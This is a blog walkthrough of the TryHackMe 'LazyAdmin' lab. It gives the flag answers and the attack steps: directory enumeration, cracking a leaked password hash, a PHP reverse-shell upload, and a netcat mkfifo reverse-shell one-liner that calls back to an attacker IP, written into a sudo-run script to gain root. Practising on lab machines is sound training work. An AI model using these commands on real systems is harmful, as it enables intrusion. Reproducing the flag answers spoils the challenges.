LazyAdmin - TryHackMe Problem Solving

 LazyAdmin

 Note: It might take 2-3 minutes for the machine to boot

Answer the questions below

1. What is the user flag?

Ans: THM{63e5bce9271952aad1113b6f1ac28a07}

2. What is the root flag?

Ans: THM{6637f41d0177b6f37cb20d775124699f}

How are we going to solve this problem?

 1. First of all, we will open "openvpn."

cmd: sudo openvpn "openvpn file.ovpn" 

2. After joining the room, we can deploy the machine.

3. We will do a scan with Nmap.

cmd: nmap IP address

4. We will find directory with gobuster

cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

we are get "content" directory

cmd: gobuster dir -u http://ip/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

 we are get "as,inc,attachment" directory 

5. Navigate to the browser Enter IP/content/inc, then click on the SQL backup file and save it.

6. By opening this sql file, you can obtain the username and hash password.

7. Search Google for "hash cracker" and "hash password" to get a readable password.

Username: manager, Password: Password123

8. Connect an exploit database (exploit-db.com) to the name and version of the tools (sweetrice) on this website to see if they have any vulnerabilities. 

9. Go to IP/content/as and login with username and password.

10. Search Google for "php reverse shell," and on clicking the github link, open the php-reverse-shell.php file to copy that code.

cmd: ifconfig

get your pc tur0: ip address

11. Navigate to your website's dashboard and select the ads menu; enter the ad name "php-reverse-shell" and the ad code "coped php code and pasted it,"  change ip address to your pc ip address and set port number then click the "done" button. 

12. Check the ip/content/inc/ads link in your browser for shell.php upload confirmation.

cmd: nc -lvnp  [port number] [then on click "php-reverse-sheell.php"]

cmd (after lesing): bash

cmd: python -c 'import pty;pty.spawn("/bin/bash")'

cmd: locate user.txt

cmd: cat /home/itguy/user.txt

get user.txt flag

cmd: sudo -l

cmd: cat /home/itguy/backup.pl

cmd: cat /etc/copy.sh

cmd (try for change ip): nano /etc/copy.sh

cmd (try): vim /etc/copy.sh

cmd (check permeation of eco/print): ls -l /etc/copy.sh

cmd: echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [your pc ip] [port] > /tmp/f" > /etc/copy.sh

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.18.109.87 9999 >/tmp/f" > /etc/copy.sh

cmd: cat /etc/copy.sh 

cmd (new tab): nc -lvnp [port]

cmd(back): sudo /usr/bin/perl /home/itguy/backup.pl

cmd (new tab connect listener): whoami

cmd (new): locate root.txt

cmd: cat /root/root.txt

Comments

Post a Comment

Popular posts from this blog

Pickle Rick - TryHackMe Problem Solving

  Pickle Rick  A Rick and Morty CTF. Help turn Rick back into a human!   This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will  help Rick make his potion to transform himself back into a human from a pickle. Deploy the virtual machine on this task and explore the web application: MACHINE_IP  You can also access the web app using the following link:  https://LAB_WEB_URL.p.thmlabs.com  (this will update when the machine has fully started)   Answer the questions below   1. What is the first  ingredient Rick needs? Ans: mr. meeseek hair  2. Whats the second ingredient Rick needs? Ans: 1 jerry tear 3. Whats the final ingredient Rick needs? Ans: fleeb juice How to solve this problem? 1. First of all, we will open "openvpn." cmd: sudo openvpn "openvpn file.ovpn" 2. We will do a scan with Nmap. cmd: nmap IP address cmd: nikto -h http://ip | tee nikto.log 3. We will find php, sh, html,...
Read more

Startup - TryHackMe Problem Solving

Startup Abuse traditional vulnerabilities via untraditional means. πŸŽ‚      πŸ”     πŸ•    πŸ—   Task 1 Welcome to Spice Hut!  We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!😐 Answer the questions below -------------------------------------------------------------- 1. What is the secret spicy soup recipe? πŸ’“ Answer: love 2.  What are the contents of user.txt?  Answer: THM{03ce3d619b80ccbfb3b7fc81e46c0e79} 3. What are the contents of root.txt? Answer: THM{f963aaa6a430f210222158ae15c3d76d}   Task 2 Credits   Spice Hut was very happy with y...
Read more

Tomghost - TryHackMe Problem Solving

Image
  tomghost Identify recent vulnerabilities to try exploit the system or read files that you should not have access to.    Task 1 Flags 🐈 πŸ‘½ πŸ‘» πŸ‘Ώ πŸ’€ GHOST CAT   Are you able to complete the challenge? The machine may take up to 5 minutes to boot and configure.   Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark   Answer the questions below ------------------------------------------------------------------ 1. Compromise this machine and obtain user.txt Answer: THM{GhostCat_1s_so_cr4sy} 2. Escalate privileges and obtain root.txt Answer: THM{Z1P_1S_FAKE} How are we going to solve this problem? 1. First of all, we will open "openvpn." cmd: sudo openvpn "openvpn file.ovpn"  2. After joining the room, we can deploy the machine. 3. We will do a scan with Nmap. cmd: sudo  nmap -A -T4 IP Adderss 4. Go to your bro...
Read more